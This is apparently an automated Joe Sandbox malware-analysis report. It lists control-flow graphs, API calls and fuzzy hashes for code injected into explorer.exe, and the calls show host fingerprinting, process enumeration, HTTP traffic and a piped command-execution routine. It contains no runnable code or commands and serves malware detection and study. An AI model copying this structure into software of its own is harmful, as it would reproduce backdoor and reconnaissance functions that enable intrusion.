                                                                                                                                            control_flow_graph 0 2e08424-2e0845d call 2e0b388 3 2e08466-2e08487 GetAdaptersInfo 0->3 4 2e0845f-2e08461 0->4 5 2e08676-2e0867c 3->5 6 2e0848d-2e084c0 call 2e0b388 GetAdaptersInfo call 2e0b4cc 3->6 7 2e087ea-2e087f1 4->7 9 2e08688-2e086a6 call 2e0b388 5->9 10 2e0867e-2e08683 call 2e082b4 5->10 16 2e084c5-2e084c8 6->16 17 2e087e5 9->17 18 2e086ac-2e086c3 GetComputerNameExA 9->18 10->9 19 2e084d9-2e084e1 16->19 20 2e084ca-2e084d7 16->20 17->7 21 2e086c5-2e086dc call 2e0b4cc 18->21 22 2e08729-2e08740 GetComputerNameExA 18->22 23 2e084e6-2e084fe wsprintfA 19->23 20->23 34 2e086ed-2e086f5 21->34 35 2e086de-2e086eb 21->35 25 2e08746-2e0874b 22->25 26 2e087db-2e087e0 call 2e082b4 22->26 29 2e08502-2e0850a 23->29 27 2e0875c-2e08763 25->27 28 2e0874d-2e0875a 25->28 26->17 32 2e0876b-2e08782 call 2e0b4cc 27->32 28->32 33 2e08516-2e08525 29->33 45 2e08784-2e08794 32->45 46 2e08796-2e0879e 32->46 37 2e085f2-2e08609 call 2e0b4cc 33->37 38 2e0852b-2e08530 33->38 39 2e086fa-2e08725 wsprintfA 34->39 35->39 51 2e0861a-2e08622 37->51 52 2e0860b-2e08618 37->52 42 2e08532-2e08549 call 2e0b4cc 38->42 43 2e08573-2e0858a call 2e0b4cc 38->43 39->22 57 2e0855a-2e08562 42->57 58 2e0854b-2e08558 42->58 54 2e0859b-2e085a3 43->54 55 2e0858c-2e08599 43->55 50 2e087a6-2e087d7 wsprintfA 45->50 46->50 50->26 56 2e08627-2e08659 wsprintfA 51->56 52->56 60 2e085a8-2e085ad 54->60 55->60 61 2e0865b 56->61 62 2e0865d-2e08670 56->62 59 2e08567-2e08571 57->59 58->59 63 2e085b2-2e085ed wsprintfA 59->63 60->63 61->5 62->5 62->29 63->33
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 02E0B388: NtAllocateVirtualMemory.NTDLL ref: 02E0B3BE
                                                                                                                                            • GetAdaptersInfo.IPHLPAPI ref: 02E08470
                                                                                                                                            • GetAdaptersInfo.IPHLPAPI ref: 02E084A7
                                                                                                                                            • wsprintfA.USER32 ref: 02E084F0
                                                                                                                                            • wsprintfA.USER32 ref: 02E085DB
                                                                                                                                            • wsprintfA.USER32 ref: 02E0863F
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.4569753112.0000000002E00000.00000040.00000001.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_2e00000_explorer.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: wsprintf$AdaptersInfo$AllocateMemoryVirtual
                                                                                                                                            • String ID: o
                                                                                                                                            • API String ID: 2074107575-252678980
                                                                                                                                            • Opcode ID: 297d1a7e7ca8095e50a572676fb4cd9321a35f6664537050dc1b6cbbb83bb27f
                                                                                                                                            • Instruction ID: 16033ffbfb052ad992aff4511662411a63a2f30d24211c2c28bdb0df3185178f
                                                                                                                                            • Opcode Fuzzy Hash: 297d1a7e7ca8095e50a572676fb4cd9321a35f6664537050dc1b6cbbb83bb27f
                                                                                                                                            • Instruction Fuzzy Hash: 84A1EA72249B8486DB70CB14F48439AB7A1F788788F445529EACE83B69EF7CC595CF40

                                                                                                                                            Control-flow Graph

                                                                                                                                            control_flow_graph 162 2e07274-2e072ab GetAdaptersInfo 163 2e072f8-2e072fe 162->163 164 2e072ad-2e072cd call 2e0b388 GetAdaptersInfo 162->164 166 2e07300-2e07305 call 2e082b4 163->166 167 2e0730a 163->167 171 2e072d1-2e072dd 164->171 166->167 168 2e0730f-2e07313 167->168 172 2e072e3-2e072f6 171->172 173 2e072df-2e072e1 171->173 172->163 172->171 173->168
                                                                                                                                            APIs
                                                                                                                                            • GetAdaptersInfo.IPHLPAPI ref: 02E0729C
                                                                                                                                              • Part of subcall function 02E0B388: NtAllocateVirtualMemory.NTDLL ref: 02E0B3BE
                                                                                                                                            • GetAdaptersInfo.IPHLPAPI ref: 02E072C7
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.4569753112.0000000002E00000.00000040.00000001.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_2e00000_explorer.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AdaptersInfo$AllocateMemoryVirtual
                                                                                                                                            • String ID: o
                                                                                                                                            • API String ID: 2718687846-252678980
                                                                                                                                            • Opcode ID: 7f42663b622c32a3db8ec0ccf10743740cf63e3247e40a922d1c01b602dc0a8d
                                                                                                                                            • Instruction ID: 526474109462dac7b5c04ff70e261f234159be9f6506191482446c468ca63a2b
                                                                                                                                            • Opcode Fuzzy Hash: 7f42663b622c32a3db8ec0ccf10743740cf63e3247e40a922d1c01b602dc0a8d
                                                                                                                                            • Instruction Fuzzy Hash: BC01B0B2648B4486DB30DB15E49835EB7A0F3CC798F445225EA8D47BA8DB7CC686CF44

                                                                                                                                            Control-flow Graph

                                                                                                                                            control_flow_graph 174 2e08d3c-2e08d6c call 2e0b470 GetUserNameA 177 2e08d87-2e08d95 174->177 178 2e08d6e-2e08d81 wsprintfA 174->178 178->177
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.4569753112.0000000002E00000.00000040.00000001.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_2e00000_explorer.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: NameUserwsprintf
                                                                                                                                            • String ID: engineer
                                                                                                                                            • API String ID: 54179028-2484562649
                                                                                                                                            • Opcode ID: 0d2000033b4f6b77b7c63e69016060f77196b9a618d98f030aea10d94a3709f8
                                                                                                                                            • Instruction ID: 9ca248234d0c9e9ca0633c2d534aa159e9c00d4ac0ef5d99f3e81093ea6c48c0
                                                                                                                                            • Opcode Fuzzy Hash: 0d2000033b4f6b77b7c63e69016060f77196b9a618d98f030aea10d94a3709f8
                                                                                                                                            • Instruction Fuzzy Hash: D7F07D712A4AC7D2EB70DF14E8943AA6325FB91748FC06136A14D469A8EF7CC75BCB40

                                                                                                                                            Control-flow Graph

                                                                                                                                            control_flow_graph 179 2e0a8e0-2e0a8fb call 2e08cf0 182 2e0a904-2e0a918 call 2e0b4cc 179->182 183 2e0a8fd-2e0a8ff 179->183 187 2e0a926-2e0a92b 182->187 188 2e0a91a-2e0a924 182->188 184 2e0aa04-2e0aa0b 183->184 189 2e0a930-2e0a941 call 2e0bf78 187->189 188->189 192 2e0a943-2e0a945 189->192 193 2e0a94a-2e0a983 call 2e0b470 FindFirstFileW 189->193 192->184 196 2e0a9f5-2e0a9ff call 2e082b4 193->196 197 2e0a985-2e0a98a 193->197 196->184 197->196 199 2e0a98c-2e0a9a1 FindNextFileW 197->199 201 2e0a9a3 199->201 202 2e0a9a5-2e0a9ab 199->202 201->196 203 2e0a9ad 202->203 204 2e0a9af-2e0a9dc call 2e0c144 call 2e07430 202->204 203->196 209 2e0a9f3 204->209 210 2e0a9de-2e0a9f1 LoadLibraryW 204->210 209->197 210->196
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.4569753112.0000000002E00000.00000040.00000001.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_2e00000_explorer.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: DirectorySystem
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2188284642-0
                                                                                                                                            • Opcode ID: ba65162137a8887c46524e037aee2d8e48247b8fd7d5144eb10fde51ea88d61c
                                                                                                                                            • Instruction ID: e5f677be3528c799ccfd2979536982ab22f4f28a919cacbab150a3395b2ef5f6
                                                                                                                                            • Opcode Fuzzy Hash: ba65162137a8887c46524e037aee2d8e48247b8fd7d5144eb10fde51ea88d61c
                                                                                                                                            • Instruction Fuzzy Hash: 4431FE22698B8495DB60DB14F4C435AA361F784368F91A336E79E42BE8DF3CC586CB40

                                                                                                                                            Control-flow Graph

                                                                                                                                            control_flow_graph 221 2e0b388-2e0b3c6 NtAllocateVirtualMemory 222 2e0b3d7-2e0b3e0 221->222 223 2e0b3c8-2e0b3d2 call 2e0b470 221->223 223->222
                                                                                                                                            APIs
                                                                                                                                            • NtAllocateVirtualMemory.NTDLL ref: 02E0B3BE
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.4569753112.0000000002E00000.00000040.00000001.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_2e00000_explorer.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AllocateMemoryVirtual
                                                                                                                                            • String ID: @
                                                                                                                                            • API String ID: 2167126740-2766056989
                                                                                                                                            • Opcode ID: 2e93f9f6b96c1bd6ea69c113b3f2c8e4b302791aa10c0df241b540a453c9b905
                                                                                                                                            • Instruction ID: 751f81a53acefac647a0e27906dbfdfcd0d3870bb66d4cabc0dae1e5e79d1d3b
                                                                                                                                            • Opcode Fuzzy Hash: 2e93f9f6b96c1bd6ea69c113b3f2c8e4b302791aa10c0df241b540a453c9b905
                                                                                                                                            • Instruction Fuzzy Hash: C3E0C9B2238A84C6D7509F65E49470BB760F7847B8F906305FAA906BD8CBBCC158CF00

                                                                                                                                            Control-flow Graph

                                                                                                                                            control_flow_graph 243 2e05078-2e050ba 244 2e050bc-2e050dc InternetReadFile 243->244 245 2e050de-2e050e3 244->245 246 2e0514f 244->246 245->246 247 2e050e5-2e05102 call 2e0b704 245->247 248 2e05154-2e0515c 246->248 251 2e05104-2e05106 247->251 252 2e05108-2e0514a call 2e0b3e4 247->252 251->248 252->244
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.4569753112.0000000002E00000.00000040.00000001.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_2e00000_explorer.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FileInternetRead
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 778332206-0
                                                                                                                                            • Opcode ID: 29b86a3ab9ddbe11ce9b9fbde145847ecb2975815f7cf14476ac95fa9b6fe6b1
                                                                                                                                            • Instruction ID: 44552afb8f00f9169703b2884c87b69127ea10884c0f0fe2dbafd9beff3abd0b
                                                                                                                                            • Opcode Fuzzy Hash: 29b86a3ab9ddbe11ce9b9fbde145847ecb2975815f7cf14476ac95fa9b6fe6b1
                                                                                                                                            • Instruction Fuzzy Hash: 9D21CF3231968597D760CB15E49479AB3E1F3CC788F805125EA8D83B98EB7DCA45CF00

                                                                                                                                            Control-flow Graph

                                                                                                                                            control_flow_graph 296 2e082b4-2e082cc 297 2e082ce-2e082eb NtFreeVirtualMemory 296->297 298 2e082ef-2e082f3 296->298 297->298
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.4569753112.0000000002E00000.00000040.00000001.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_2e00000_explorer.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FreeMemoryVirtual
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3963845541-0

                                                                                                                                            Control-flow Graph

                                                                                                                                            control_flow_graph 299 2e0c704-2e0c730 NtDelayExecution
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.4569753112.0000000002E00000.00000040.00000001.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_2e00000_explorer.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: DelayExecution
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1249177460-0

                                                                                                                                            Control-flow Graph

                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.4569753112.0000000002E00000.00000040.00000001.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_2e00000_explorer.jbxd

                                                                                                                                            Control-flow Graph

                                                                                                                                            control_flow_graph 107 2e05160-2e051c7 call 2e0b388 call 2e0b4cc 112 2e051d8-2e051e0 107->112 113 2e051c9-2e051d6 107->113 114 2e051e5-2e0520d call 2e0be64 112->114 113->114 117 2e05265-2e05275 114->117 118 2e0520f-2e05226 call 2e0b4cc 114->118 119 2e05284-2e0528c 117->119 120 2e05277-2e05280 117->120 126 2e05237-2e0523f 118->126 127 2e05228-2e05235 118->127 122 2e05292-2e052a9 call 2e0b4cc 119->122 123 2e05315-2e0532c call 2e0b4cc 119->123 120->119 135 2e052ba-2e052c2 122->135 136 2e052ab-2e052b8 122->136 132 2e05340-2e05348 123->132 133 2e0532e-2e0533e 123->133 130 2e05244-2e0525b call 2e0be64 126->130 127->130 130->117 141 2e05260 call 2e0be64 130->141 138 2e05350-2e05397 HttpOpenRequestA 132->138 133->138 137 2e052c7-2e05310 HttpOpenRequestA 135->137 136->137 140 2e0539c-2e053a2 137->140 138->140 142 2e053a4 140->142 143 2e053a9-2e053b1 140->143 141->117 144 2e05467-2e0546d 142->144 145 2e053b3-2e053d0 InternetSetOptionA 143->145 146 2e053d6-2e053de 143->146 147 2e05479 144->147 148 2e0546f-2e05474 call 2e082b4 144->148 145->146 149 2e053e0-2e05422 call 2e0c0fc * 2 HttpSendRequestA 146->149 150 2e05424-2e0543f HttpSendRequestA 146->150 152 2e0547b-2e05482 147->152 148->147 154 2e05443-2e05448 149->154 150->154 155 2e0544a 154->155 156 2e0544c-2e0545b call 2e082b4 154->156 155->144 156->144 156->152
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 02E0B388: NtAllocateVirtualMemory.NTDLL ref: 02E0B3BE
                                                                                                                                            • HttpOpenRequestA.WININET ref: 02E05305
                                                                                                                                            • HttpOpenRequestA.WININET ref: 02E05391
                                                                                                                                            • InternetSetOptionA.WININET ref: 02E053D0
                                                                                                                                            • HttpSendRequestA.WININET ref: 02E05418
                                                                                                                                            • HttpSendRequestA.WININET ref: 02E05439
                                                                                                                                              • Part of subcall function 02E082B4: NtFreeVirtualMemory.NTDLL ref: 02E082E5
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.4569753112.0000000002E00000.00000040.00000001.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_2e00000_explorer.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: HttpRequest$MemoryOpenSendVirtual$AllocateFreeInternetOption
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2140924187-0

                                                                                                                                            Control-flow Graph

                                                                                                                                            control_flow_graph 211 2e08c30-2e08c7b call 2e0b470 * 2 FindFirstVolumeW 216 2e08c81-2e08cd8 GetVolumeInformationW FindVolumeClose 211->216 217 2e08c7d-2e08c7f 211->217 219 2e08ce3 216->219 220 2e08cda-2e08ce1 216->220 218 2e08ce5-2e08cec 217->218 219->218 220->218
                                                                                                                                            APIs
                                                                                                                                            • FindFirstVolumeW.KERNEL32 ref: 02E08C6A
                                                                                                                                            • GetVolumeInformationW.KERNEL32 ref: 02E08CBE
                                                                                                                                            • FindVolumeClose.KERNEL32 ref: 02E08CCD
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.4569753112.0000000002E00000.00000040.00000001.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_2e00000_explorer.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Volume$Find$CloseFirstInformation
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 586543143-0

                                                                                                                                            Control-flow Graph

                                                                                                                                            control_flow_graph 225 2e08a58-2e08a70 226 2e08a72-2e08a74 225->226 227 2e08a79-2e08acc 225->227 228 2e08bd4-2e08bd8 226->228 229 2e08ad8-2e08ae4 227->229 230 2e08bd2 229->230 231 2e08aea-2e08b41 call 2e0c0fc call 2e07430 229->231 230->228 236 2e08b47-2e08b4d 231->236 237 2e08bcd 231->237 236->237 239 2e08b4f-2e08b57 236->239 237->229 239->237 240 2e08b59-2e08b61 239->240 241 2e08b63-2e08b73 GetProcAddress GetProcAddressForCaller 240->241 242 2e08b75-2e08bcb 240->242 241->242 242->228
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.4569753112.0000000002E00000.00000040.00000001.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_2e00000_explorer.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AddressProc
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 190572456-0

                                                                                                                                            Control-flow Graph

                                                                                                                                            control_flow_graph 255 2e0545d-2e05461 256 2e05265-2e05275 255->256 257 2e05467-2e0546d 255->257 260 2e05284-2e0528c 256->260 261 2e05277-2e05280 256->261 258 2e05479 257->258 259 2e0546f-2e05474 call 2e082b4 257->259 263 2e0547b-2e05482 258->263 259->258 264 2e05292-2e052a9 call 2e0b4cc 260->264 265 2e05315-2e0532c call 2e0b4cc 260->265 261->260 272 2e052ba-2e052c2 264->272 273 2e052ab-2e052b8 264->273 270 2e05340-2e05348 265->270 271 2e0532e-2e0533e 265->271 275 2e05350-2e05397 HttpOpenRequestA 270->275 271->275 274 2e052c7-2e05310 HttpOpenRequestA 272->274 273->274 276 2e0539c-2e053a2 274->276 275->276 277 2e053a4 276->277 278 2e053a9-2e053b1 276->278 277->257 279 2e053b3-2e053d0 InternetSetOptionA 278->279 280 2e053d6-2e053de 278->280 279->280 281 2e053e0-2e05422 call 2e0c0fc * 2 HttpSendRequestA 280->281 282 2e05424-2e0543f HttpSendRequestA 280->282 284 2e05443-2e05448 281->284 282->284 285 2e0544a 284->285 286 2e0544c-2e0545b call 2e082b4 284->286 285->257 286->257 286->263
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.4569753112.0000000002E00000.00000040.00000001.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_2e00000_explorer.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: HttpOpenRequest
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1984915467-0

                                                                                                                                            Control-flow Graph

                                                                                                                                            control_flow_graph 292 2e06c6c-2e06ca1 CreateThread 293 2e06ca3-2e06ca8 292->293 294 2e06caa 292->294 295 2e06cac-2e06cb0 293->295 294->295
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.4569753112.0000000002E00000.00000040.00000001.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_2e00000_explorer.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateThread
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2422867632-0
                                                                                                                                            APIs
                                                                                                                                            • CreatePipe.KERNEL32 ref: 02E02233
                                                                                                                                            • SetHandleInformation.KERNEL32 ref: 02E0224D
                                                                                                                                            • CreatePipe.KERNEL32 ref: 02E0226E
                                                                                                                                            • SetHandleInformation.KERNEL32 ref: 02E02288
                                                                                                                                            • CreatePipe.KERNEL32 ref: 02E022A9
                                                                                                                                            • SetHandleInformation.KERNEL32 ref: 02E022C3
                                                                                                                                            • CreateProcessW.KERNEL32 ref: 02E02385
                                                                                                                                              • Part of subcall function 02E0B388: NtAllocateVirtualMemory.NTDLL ref: 02E0B3BE
                                                                                                                                            • PeekNamedPipe.KERNEL32 ref: 02E02434
                                                                                                                                            • ReadFile.KERNEL32 ref: 02E02490
                                                                                                                                            • PeekNamedPipe.KERNEL32 ref: 02E024E4
                                                                                                                                            • ReadFile.KERNEL32 ref: 02E02540
                                                                                                                                            • GetExitCodeProcess.KERNEL32 ref: 02E02579
                                                                                                                                            • TerminateProcess.KERNEL32 ref: 02E025AA
                                                                                                                                            • CloseHandle.KERNEL32 ref: 02E025B8
                                                                                                                                              • Part of subcall function 02E0C704: NtDelayExecution.NTDLL ref: 02E0C726
                                                                                                                                            • CloseHandle.KERNEL32 ref: 02E025C6
                                                                                                                                            • CloseHandle.KERNEL32 ref: 02E025D4
                                                                                                                                            • CloseHandle.KERNEL32 ref: 02E025E2
                                                                                                                                              • Part of subcall function 02E082B4: NtFreeVirtualMemory.NTDLL ref: 02E082E5
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.4569753112.0000000002E00000.00000040.00000001.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_2e00000_explorer.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Handle$Pipe$CloseCreate$InformationProcess$FileMemoryNamedPeekReadVirtual$AllocateCodeDelayExecutionExitFreeTerminate
                                                                                                                                            • String ID: h
                                                                                                                                            • API String ID: 30365702-2439710439
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.4569753112.0000000002E00000.00000040.00000001.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_2e00000_explorer.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateFileInitStringUnicode
                                                                                                                                            • String ID: 0$@
                                                                                                                                            • API String ID: 2498367268-1545510068
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 02E0B388: NtAllocateVirtualMemory.NTDLL ref: 02E0B3BE
                                                                                                                                            • FindFirstFileA.KERNEL32 ref: 02E02BE7
                                                                                                                                            • wsprintfA.USER32 ref: 02E02CAD
                                                                                                                                            • FindNextFileA.KERNEL32 ref: 02E02CDA
                                                                                                                                            • FindClose.KERNEL32 ref: 02E02CED
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.4569753112.0000000002E00000.00000040.00000001.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_2e00000_explorer.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Find$File$AllocateCloseFirstMemoryNextVirtualwsprintf
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 65906682-0
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.4569753112.0000000002E00000.00000040.00000001.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_2e00000_explorer.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Internet$CloseHandle$ConnectHttpOpenRequest
                                                                                                                                            • String ID: GET
                                                                                                                                            • API String ID: 830097650-1805413626
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.4569753112.0000000002E00000.00000040.00000001.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_2e00000_explorer.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Process32$FirstNext$wsprintf$AllocateCloseCreateHandleMemorySnapshotToolhelp32Virtual
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3605396869-0
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.4569753112.0000000002E00000.00000040.00000001.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_2e00000_explorer.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: File$View$CloseCreateFreeHandleMappingUnmapVirtual
                                                                                                                                            • String ID: @
                                                                                                                                            • API String ID: 1610889594-2766056989
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.4569753112.0000000002E00000.00000040.00000001.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_2e00000_explorer.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: File$View$CloseCreateFreeHandleMappingUnmapVirtual
                                                                                                                                            • String ID: @
                                                                                                                                            • API String ID: 1610889594-2766056989
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.4569753112.0000000002E00000.00000040.00000001.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_2e00000_explorer.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Process32wsprintf$CreateFirstNextSnapshotToolhelp32
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4137211488-0
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.4569753112.0000000002E00000.00000040.00000001.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_2e00000_explorer.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Internet$CloseHandle$Open
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2762225225-0
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000008.00000002.4569753112.0000000002E00000.00000040.00000001.00020000.00000000.sdmp, Offset: 02E00000, based on PE: true
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_8_2_2e00000_explorer.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CloseHandlewsprintf$CreateProcess
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2803068115-0